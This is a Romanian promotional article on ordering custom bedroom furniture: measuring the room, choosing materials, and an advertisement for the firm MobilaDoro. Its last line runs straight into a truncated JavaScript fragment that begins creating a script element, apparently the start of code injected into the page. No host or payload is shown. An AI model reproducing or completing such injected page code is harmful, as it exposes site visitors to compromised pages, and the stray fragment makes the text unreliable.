mobila dormitor la comanda

mobila dormitor la comandaDormitorul este camera unde va retrageti dupa o zi lunga si care trebuie sa fie un loc benefic pentru odihna atat de necesara si pentru relaxare. Prin urmare, va trebui sa va faceti o mobila de dormitor la comanda care sa creeze o atmosfera relaxanta si care sa transforme dormitorul intr-un sanctuar personal. Alegeti un mobilier de dormitor, care nu numai sa arate bine in camera, dar, de asemenea, se fie si confortabil si sa va ofere un mod de viata usor. Acest articol va ajuta sa invatati cum sa va faceti mobila de dormitor la comanda.

Masuratorile care se fac pentru mobila de dormitor la comanda

Primul pas pe care trebuie sa il faceti inainte de a da comanda de mobila de dormitor il reprezinta masurarea dormitorului. Dupa ce ati masurat camera din perete in perete cu o ruleta sau un metru, va trebui sa masurati si mobila care mai exista in camera, daca mai exista, iar dupa aceea sa stabiliti care sunt dimensiunile pe care le doriti pentru fiecare piesa de mobilier. De exemplu, masurati locul in care doriti sa instalati patul si notati dimensiunile exacte. In continuare, faceti acelasi lucru pentru fiecare dulap sau sifonier, astfel incat, la sfarsit sa stiti cu precizie care vor fi dimensiunile fiecarui mobilier. Se fac toate aceste masuratori, pentru ca, in general, motivul principal pentru care se face mobila de dormitor la comanda este de a crea o mobila care sa se potriveasca perfect cu spatiul pe care il aveti, iar de aici va rezulta si confortul.

Ce trebuie sa aveti in vedere cand va faceti mobila de dormitor la comanda

Cand decideti sa va faceti mobila de dormitor la comanda, luati in considerare si cat timp aveti de gand sa utilizati acest mobilier. Daca doriti sa il folositi o perioada mai scurta de timp, va recomand sa comandati o mobila mai ieftina, dar daca intentionati ca mai tarziu sa o vindeti sau sa o lasati copiilor sau nepotilor, incercati sa va axati pe materiale de calitate, care sa reziste in timp, iar piesele de mobilier trebuie sa fie grele, de lux si sa dureze de-a lungul anilor. In caz contrar, optati pentru variante mai ieftine, dar durabile.

In ceea ce priveste materialele folosite, este de preferat sa alegeti materiale de calitate, dar aveti grija sa nu va lasati pacalit de ideea ca mobilierul din lemn masiv este superior mobilierului realizat din panouri mari de placaj. Pe langa faptul ca este mult mai greu, lemnul este poros, se poate deforma cu usurinta si in timp se poate extinde.

La MobilaDoro va puteti face orice mobila dormitor la comanda si nu este nevoie sa optati pentru un set intreg, deoarece aceasta firma realizeaza si piese de mobilier individuale. Printre avantajele de care beneficiati aici se numara asistenta si consultanta gratuita pentru realizarea oricarui proiect, masurarea spatiului de catre personalul firmei, iar in ceea ce priveste mobila realizata, aceasta beneficiaza de o garantie de 2 ani si este realizata in cel mult 20 de zile lucratoare din momentul in care se definitiveaza comanda.var d=document;var s=d.createElement(‘script’);